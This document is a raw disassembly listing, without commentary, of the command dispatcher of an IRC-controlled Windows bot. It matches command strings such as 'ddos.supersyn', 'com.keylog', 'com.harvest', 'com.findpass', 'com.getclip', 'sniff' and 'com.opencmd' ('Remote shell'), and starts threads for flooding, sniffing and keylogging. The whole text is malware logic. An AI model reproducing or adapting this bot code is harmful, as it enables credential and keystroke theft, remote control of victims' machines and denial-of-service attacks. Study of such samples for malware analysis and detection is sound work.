jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_410100: ; CODE XREF: sub_40EE72+1274�j
push edi
push offset aRoot_stop ; "root.stop"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410129
push [ebp+esi+var_90]
push 8
push offset aScan ; "Scan"
push offset aExploitation ; "Exploitation"
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_410129: ; CODE XREF: sub_40EE72+129D�j
push edi
push offset aRoot_stats ; "root.stats"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BA5
push edi
push offset aRoot_st ; "root.st"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BA5
push edi
push offset aIrc_reconnect ; "irc.reconnect"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414B84
push edi
push offset aIrc_r ; "irc.r"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414B84
push edi
push offset aIrc_disconnect ; "irc.disconnect"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414B62
push edi
push offset aIrc_d ; "irc.d"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414B62
push edi
push offset aIrc_quit ; "irc.quit"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414B1A
push edi
push offset aIrc_q ; "irc.q"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414B1A
push edi
push offset aIrc_status ; "irc.status"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414ADB
push edi
push offset aIrc_s ; "irc.s"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414ADB
push edi
push offset aIrc_id ; "irc.id"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414ACF
push edi
push offset aIrc_i ; "irc.i"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414ACF
push edi
push offset aCom_rebewt ; "com.rebewt"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410277
call sub_40AC20
test eax, eax
mov eax, offset dword_432788
jnz short loc_410249
mov eax, offset dword_432754
loc_410249: ; CODE XREF: sub_40EE72+13D0�j
push eax
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 1Ch
jmp loc_40F822
; ---------------------------------------------------------------------------
loc_410277: ; CODE XREF: sub_40EE72+13C2�j
push edi
push offset aThreads_list ; "threads.list"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4149DE
push edi
push offset aThreads_l ; "threads.l"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4149DE
push edi
push offset aIrc_aliases ; "irc.aliases"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4149BE
push edi
push offset aIrc_al ; "irc.al"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4149BE
push edi
push offset aIrc_log ; "irc.log"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4148CB
push edi
push offset aIrc_lg ; "irc.lg"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4148CB
push edi
push offset aUtil_clearlog ; "util.clearlog"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4148B2
push edi
push offset aUtil_clg ; "util.clg"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4148B2
push edi
push offset aCom_netinfo ; "com.netinfo"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414880
push edi
push offset aCom_ni ; "com.ni"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414880
push edi
push offset aDdos_supersyn ; "ddos.supersyn"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_410459
mov edi, [ebp+esi+var_90]
push 7Fh
lea eax, [ebp+var_76C]
push edi
push eax
call sub_418C10
mov eax, [ebp+esi+var_8C]
push 7Fh
mov [ebp+arg_18], eax
push eax
lea eax, [ebp+var_6EC]
push eax
call sub_418C10
mov esi, [ebp+esi+var_88]
push 7Fh
lea eax, [ebp+var_66C]
push esi
push eax
call sub_418C10
push 7Fh
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 30h
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
push esi
mov [ebp+var_564], eax
mov eax, [ebp+arg_4]
push [ebp+arg_18]
mov [ebp+var_770], eax
lea eax, [ebp+var_2DC]
push edi
push offset unk_432694
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 14h
push eax
call sub_416D5C
add esp, 20h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_770]
push ebx
push eax
push offset sub_401831
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_410448
loc_410432: ; CODE XREF: sub_40EE72+15D4�j
cmp [ebp+var_560], ebx
jnz loc_41460C
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_410432
; ---------------------------------------------------------------------------
loc_410448: ; CODE XREF: sub_40EE72+15BE�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_432648
jmp loc_413BFD
; ---------------------------------------------------------------------------
loc_410459: ; CODE XREF: sub_40EE72+14E6�j
push edi
push offset aCom_sysinfo ; "com.sysinfo"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414852
push edi
push offset aCom_si ; "com.si"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414852
push edi
push offset aIrc_rem0ve ; "irc.rem0ve"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414818
push edi
push offset aIrc_rm0 ; "irc.rm0"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414818
push edi
push offset aCom_procs ; "com.procs"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41470F
push edi
push offset aCom_ps ; "com.ps"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41470F
push edi
push offset aCom_harvest ; "com.harvest"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4146F1
push edi
push offset aCom_key ; "com.key"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4146F1
push edi
push offset aCom_uptime ; "com.uptime"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41466C
push edi
push offset aCom_up ; "com.up"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41466C
push edi
push offset aCom_driveinfo ; "com.driveinfo"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41464F
push edi
push offset aCom_drv ; "com.drv"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41464F
push edi
push offset aCom_testdlls ; "com.testdlls"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414636
push edi
push offset aCom_dll ; "com.dll"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414636
push edi
push offset aCom_opencmd ; "com.opencmd"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4145CA
push edi
push offset aCom_ocmd ; "com.ocmd"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4145CA
push edi
push offset aCom_ocmd_off ; "com.ocmd.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4105D2
push [ebp+esi+var_90]
push 7
push offset aRemoteShell ; "Remote shell"
push offset aCmd ; "[CMD]"
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_4105D2: ; CODE XREF: sub_40EE72+1746�j
push edi
push offset aIrc_who ; "irc.who"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41065E
cmp [ebp+var_8], ebx
jnz short loc_410602
push ebx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_410602: ; CODE XREF: sub_40EE72+1774�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_410607: ; CODE XREF: sub_40EE72+17DB�j
cmp [edi], bl
lea eax, [edi+1]
jnz short loc_410613
mov eax, offset aEmpty ; "<Empty>"
loc_410613: ; CODE XREF: sub_40EE72+179A�j
push eax
push esi
lea eax, [ebp+var_2DC]
push offset aD_S ; "%d. %s"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_410607
push offset dword_43251C
loc_410654: ; CODE XREF: sub_40EE72+5C58�j
call sub_40BF6D
jmp loc_414F46
; ---------------------------------------------------------------------------
loc_41065E: ; CODE XREF: sub_40EE72+176F�j
push edi
push offset aCom_getclip ; "com.getclip"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414581
push edi
push offset aCom_gc ; "com.gc"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414581
push edi
push offset aUtil_flusharp ; "util.flusharp"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414556
push edi
push offset aUtil_farp ; "util.farp"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414556
push edi
push offset aUtil_flushdns ; "util.flushdns"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414532
push edi
push offset aUtil_fdns ; "util.fdns"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414532
push edi
push offset aRoot_currentip ; "root.currentip"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4144F5
push edi
push offset aRoot_cip ; "root.cip"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4144F5
push edi
push offset aDaemon_rlogi_0 ; "daemon.rlogin.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4143A4
push edi
push offset aDaemon_rl_on ; "daemon.rl.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4143A4
push edi
push offset aDaemon_httpd_o ; "daemon.httpd.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41422E
push edi
push offset aDaemon_web_on ; "daemon.web.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41422E
push edi
push offset aDaemon_tftp_on ; "daemon.tftp.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4140ED
push edi
push offset aDaemon_tf_on ; "daemon.tf.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4140ED
push edi
push offset aCom_findpass ; "com.findpass"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414043
push edi
push offset aCom_fp ; "com.fp"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414043
push edi
push offset aAsc ; "asc"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413D44
push edi
push offset aSa ; "sa"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413D44
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz loc_40F239
push [ebp+arg_8]
push offset aIrc_nick ; "irc.nick"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413D28
push [ebp+arg_8]
push offset aIrc_n ; "irc.n"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413D28
push [ebp+arg_8]
push offset aIrc_join ; "irc.join"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413D05
push [ebp+arg_8]
push offset aIrc_j ; "irc.j"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413D05
push [ebp+arg_8]
push offset aIrc_part ; "irc.part"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413CE9
push [ebp+arg_8]
push offset aIrc_pt ; "irc.pt"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413CE9
push [ebp+arg_8]
push offset aIrc_raw ; "irc.raw"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413CAF
push [ebp+arg_8]
push offset aIrc_ra ; "irc.ra"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413CAF
push [ebp+arg_8]
push offset aThreads_kill ; "threads.kill"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413BDD
push [ebp+arg_8]
push offset aThreads_k ; "threads.k"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413BDD
push [ebp+arg_8]
push offset aClone_quit ; "clone.quit"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413B32
push [ebp+arg_8]
push offset aClone_q ; "clone.q"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413B32
push [ebp+arg_8]
push offset aClone_rndnick ; "clone.rndnick"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413AE4
push [ebp+arg_8]
push offset aClone_rn ; "clone.rn"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413AE4
push [ebp+arg_8]
push offset aIrc_prefix ; "irc.prefix"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413ACF
push [ebp+arg_8]
push offset aIrc_pr ; "irc.pr"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413ACF
push [ebp+arg_8]
push offset aCom_open ; "com.open"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413AA5
push [ebp+arg_8]
push offset aCom_o ; "com.o"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413AA5
push [ebp+arg_8]
push offset aIrc_setserve ; "irc.setserve"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413A8C
push [ebp+arg_8]
push offset aIrc_se ; "irc.se"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413A8C
push [ebp+arg_8]
push offset aIrc_dns ; "irc.dns"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4139FA
push [ebp+arg_8]
push offset aIrc_dn ; "irc.dn"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4139FA
push [ebp+arg_8]
push offset aCom_killprocna ; "com.killprocname"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4139CE
push [ebp+arg_8]
push offset aCom_kpn ; "com.kpn"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4139CE
push [ebp+arg_8]
push offset aCom_prockillid ; "com.prockillid"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413973
push [ebp+arg_8]
push offset aCom_pkid ; "com.pkid"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413973
push [ebp+arg_8]
push offset aCom_delete ; "com.delete"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413938
push [ebp+arg_8]
push offset aCom_del ; "com.del"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413938
push [ebp+arg_8]
push offset aDcc_get ; "dcc.get"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41384E
push [ebp+arg_8]
push offset aDcc_gt ; "dcc.gt"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41384E
push [ebp+arg_8]
push offset aCom_filelist ; "com.filelist"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413830
push [ebp+arg_8]
push offset aCom_fl ; "com.fl"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413830
push [ebp+arg_8]
push offset aIrc_visit ; "irc.visit"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41374F
push [ebp+arg_8]
push offset aIrc_v ; "irc.v"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41374F
push [ebp+arg_8]
push offset aMirc_cmd ; "mirc.cmd"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413714
push [ebp+arg_8]
push offset aMirc_cmd ; "mirc.cmd"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413714
push [ebp+arg_8]
push offset aCom_cmd ; "com.cmd"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4136C9
push [ebp+arg_8]
push offset aCom_cm ; "com.cm"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4136C9
push [ebp+arg_8]
push offset aCom_readfile ; "com.readfile"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413643
push [ebp+arg_8]
push offset aCom_rf ; "com.rf"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413643
push [ebp+arg_8]
push offset aSniff ; "sniff"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_410CCC
push edi
push offset aOn ; "on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_410C97
push 19h
call sub_416FA4
test eax, eax
pop ecx
jle short loc_410BC1
push offset unk_432250
jmp loc_410D38
; ---------------------------------------------------------------------------
loc_410BC1: ; CODE XREF: sub_40EE72+1D43�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_4F0], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_464], eax
jnz short loc_410C03
mov esi, offset aF_1 ; "#f"
push offset byte_436EDC
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410C03
mov esi, [ebp+var_8C]
loc_410C03: ; CODE XREF: sub_40EE72+1D73�j
; sub_40EE72+1D89�j
push esi
lea eax, [ebp+var_4EC]
push 80h
push eax
call sub_41782A
add esp, 0Ch
lea eax, [ebp+var_2DC]
push offset unk_432210
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 19h
push eax
call sub_416D5C
add esp, 14h
mov [ebp+var_46C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F0]
push ebx
push eax
push offset sub_402688
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_46C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_410C86
loc_410C70: ; CODE XREF: sub_40EE72+1E12�j
cmp [ebp+var_460], ebx
jnz loc_410E57
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_410C70
; ---------------------------------------------------------------------------
loc_410C86: ; CODE XREF: sub_40EE72+1DFC�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_4321C4
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_410C97: ; CODE XREF: sub_40EE72+1D33�j
push edi
push offset aOff ; "off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_410E57
push ebx
push 19h
call sub_416F57
pop ecx
cmp eax, ebx
pop ecx
jle short loc_410CC5
push eax
push offset unk_432178
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_410CC5: ; CODE XREF: sub_40EE72+1E46�j
push offset unk_432140
jmp short loc_410D38
; ---------------------------------------------------------------------------
loc_410CCC: ; CODE XREF: sub_40EE72+1D1E�j
push [ebp+arg_8]
push offset aCom_keylog ; "com.keylog"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_410E81
push edi
push offset aOn ; "on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_410D4B
push edi
push offset aFile ; "file"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_410D4B
push edi
push offset aOff ; "off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_410E57
push ebx
push 1Bh
call sub_416F57
pop ecx
cmp eax, ebx
pop ecx
jle short loc_410D33
push eax
push offset unk_4320E0
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_410D33: ; CODE XREF: sub_40EE72+1EB4�j
push offset unk_4320A4
loc_410D38: ; CODE XREF: sub_40EE72+1D4A�j
; sub_40EE72+1E58�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
pop ecx
pop ecx
jmp loc_410E57
; ---------------------------------------------------------------------------
loc_410D4B: ; CODE XREF: sub_40EE72+1E80�j
; sub_40EE72+1E91�j
push 1Bh
call sub_416FA4
test eax, eax
pop ecx
jle short loc_410D5E
push offset unk_432074
jmp short loc_410D38
; ---------------------------------------------------------------------------
loc_410D5E: ; CODE XREF: sub_40EE72+1EE3�j
mov eax, [ebp+arg_4]
push edi
mov [ebp+var_4F0], eax
mov eax, [ebp+var_4]
push offset aFile ; "file"
mov [ebp+var_468], eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410D8D
mov [ebp+var_464], 1
jmp short loc_410D96
; ---------------------------------------------------------------------------
loc_410D8D: ; CODE XREF: sub_40EE72+1F0D�j
mov eax, [ebp+var_8]
mov [ebp+var_464], eax
loc_410D96: ; CODE XREF: sub_40EE72+1F19�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_410DBD
mov esi, offset aF_0 ; "#f"
push offset byte_436EDC
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410DBD
mov esi, [ebp+var_8C]
loc_410DBD: ; CODE XREF: sub_40EE72+1F2D�j
; sub_40EE72+1F43�j
push esi
lea eax, [ebp+var_4E8]
push 80h
push eax
call sub_41782A
add esp, 0Ch
lea eax, [ebp+var_2DC]
push offset unk_432044
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 1Bh
push eax
call sub_416D5C
add esp, 14h
mov [ebp+var_4EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F0]
push ebx
push eax
push offset sub_4023A7
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_4EC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_410E3C
loc_410E2A: ; CODE XREF: sub_40EE72+1FC8�j
cmp [ebp+var_460], ebx
jnz short loc_410E57
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_410E2A
; ---------------------------------------------------------------------------
loc_410E3C: ; CODE XREF: sub_40EE72+1FB6�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_431FF8
loc_410E48: ; CODE XREF: sub_40EE72+1E20�j
; sub_40EE72+1E4E�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
add esp, 0Ch
loc_410E57: ; CODE XREF: sub_40EE72+1E04�j
; sub_40EE72+1E34�j ...
cmp [ebp+var_8], ebx
jnz loc_40F822
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
jmp loc_40F822
; ---------------------------------------------------------------------------
loc_410E81: ; CODE XREF: sub_40EE72+1E6B�j
push [ebp+arg_8]
push offset aCom_net ; "com.net"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_411114
cmp ds:dword_43AE68, ebx
jz short loc_410EB2
cmp ds:dword_43AE90, ebx
jz short loc_410EB2
push offset dword_431FA8
jmp loc_4110CE
; ---------------------------------------------------------------------------
loc_410EB2: ; CODE XREF: sub_40EE72+202C�j
; sub_40EE72+2034�j
cmp [ebp+var_C], ebx
jz loc_4110DC
mov eax, [ebp+esi+var_8C]
mov [ebp+arg_0], ebx
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_410EDA
push eax
push [ebp+var_C]
call sub_417880
pop ecx
mov [ebp+arg_0], eax
pop ecx
loc_410EDA: ; CODE XREF: sub_40EE72+2058�j
push edi
push offset aStart ; "start"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410F26
cmp [ebp+arg_18], ebx
jz short loc_410EFA
push [ebp+arg_0]
push 3
jmp loc_410F84
; ---------------------------------------------------------------------------
loc_410EFA: ; CODE XREF: sub_40EE72+207C�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D9B3
add esp, 0Ch
test eax, eax
jz short loc_410F1C
push offset dword_431F6C
jmp loc_4110CE
; ---------------------------------------------------------------------------
loc_410F1C: ; CODE XREF: sub_40EE72+209E�j
push offset dword_431F3C
jmp loc_4110CE
; ---------------------------------------------------------------------------
loc_410F26: ; CODE XREF: sub_40EE72+2077�j
push edi
push offset aStop ; "stop"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410F3E
push [ebp+arg_0]
push 4
jmp short loc_410F84
; ---------------------------------------------------------------------------
loc_410F3E: ; CODE XREF: sub_40EE72+20C3�j
push edi
push offset aPause ; "pause"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410F56
push [ebp+arg_0]
push 5
jmp short loc_410F84
; ---------------------------------------------------------------------------
loc_410F56: ; CODE XREF: sub_40EE72+20DB�j
push edi
push offset aContinue ; "continue"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410F6E
push [ebp+arg_0]
push 6
jmp short loc_410F84
; ---------------------------------------------------------------------------
loc_410F6E: ; CODE XREF: sub_40EE72+20F3�j
push edi
push offset aDelete ; "delete"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410F90
push [ebp+arg_0]
push 1
loc_410F84: ; CODE XREF: sub_40EE72+2083�j
; sub_40EE72+20CA�j ...
call sub_40D719
pop ecx
pop ecx
jmp loc_4110AB
; ---------------------------------------------------------------------------
loc_410F90: ; CODE XREF: sub_40EE72+210B�j
push edi
push offset aShare ; "share"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410FFB
cmp [ebp+arg_18], ebx
jz short loc_410FCE
cmp [ebp+var_9C4], bl
jz short loc_410FC1
push ebx
push [ebp+arg_18]
push 1
loc_410FB4: ; CODE XREF: sub_40EE72+215A�j
call sub_40DAF0
add esp, 0Ch
jmp loc_4110AB
; ---------------------------------------------------------------------------
loc_410FC1: ; CODE XREF: sub_40EE72+213A�j
push [ebp+esi+var_88]
push [ebp+arg_18]
push ebx
jmp short loc_410FB4
; ---------------------------------------------------------------------------
loc_410FCE: ; CODE XREF: sub_40EE72+2132�j
push ebx
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DCE6
add esp, 10h
test eax, eax
jz short loc_410FF1
push offset dword_431EE0
jmp loc_4110CE
; ---------------------------------------------------------------------------
loc_410FF1: ; CODE XREF: sub_40EE72+2173�j
push offset dword_431EB0
jmp loc_4110CE
; ---------------------------------------------------------------------------
loc_410FFB: ; CODE XREF: sub_40EE72+212D�j
push edi
push offset aUser ; "user"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41107E
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_411057
cmp [ebp+var_9C4], bl
jz short loc_41102D
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push ebx
push eax
push 1
jmp short loc_411047
; ---------------------------------------------------------------------------
loc_41102D: ; CODE XREF: sub_40EE72+21A7�j
push [ebp+var_4]
mov esi, [ebp+esi+var_88]
cmp esi, ebx
push [ebp+var_8C]
push [ebp+arg_4]
jz short loc_411051
push esi
push eax
push ebx
loc_411047: ; CODE XREF: sub_40EE72+21B9�j
; sub_40EE72+21E3�j
call sub_40DE07
add esp, 18h
jmp short loc_4110AB
; ---------------------------------------------------------------------------
loc_411051: ; CODE XREF: sub_40EE72+21D0�j
push ebx
push eax
push 2
jmp short loc_411047
; ---------------------------------------------------------------------------
loc_411057: ; CODE XREF: sub_40EE72+219F�j
push ebx
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40E337
add esp, 10h
test eax, eax
jz short loc_411077
push offset dword_431E78
jmp short loc_4110CE
; ---------------------------------------------------------------------------
loc_411077: ; CODE XREF: sub_40EE72+21FC�j
push offset dword_431E4C
jmp short loc_4110CE
; ---------------------------------------------------------------------------
loc_41107E: ; CODE XREF: sub_40EE72+2198�j
push edi
push offset aSend ; "send"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4110C9
cmp [ebp+arg_18], ebx
jz short loc_4110C2
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E5EB
add esp, 10h
loc_4110AB: ; CODE XREF: sub_40EE72+2119�j
; sub_40EE72+214A�j ...
push eax
push offset aS_3 ; "%s"
loc_4110B1: ; CODE XREF: sub_40EE72+4852�j
; sub_40EE72+4B79�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
loc_4110BD: ; CODE XREF: sub_40EE72+5703�j
add esp, 0Ch
jmp short loc_4110DC
; ---------------------------------------------------------------------------
loc_4110C2: ; CODE XREF: sub_40EE72+2220�j
push offset dword_431E1C
jmp short loc_4110CE
; ---------------------------------------------------------------------------
loc_4110C9: ; CODE XREF: sub_40EE72+221B�j
push offset dword_431DF0
loc_4110CE: ; CODE XREF: sub_40EE72+203B�j
; sub_40EE72+20A5�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_4110DC: ; CODE XREF: sub_40EE72+2043�j
; sub_40EE72+224E�j ...
cmp [ebp+var_8], ebx
jnz short loc_4110FD
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_4110FD: ; CODE XREF: sub_40EE72+226D�j
; sub_40EE72+4847�j ...
mov esi, [ebp+arg_24]
loc_411100: ; CODE XREF: sub_40EE72+9B3�j
; sub_40EE72+4B35�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
pop ecx
mov eax, esi
jmp loc_40F23C
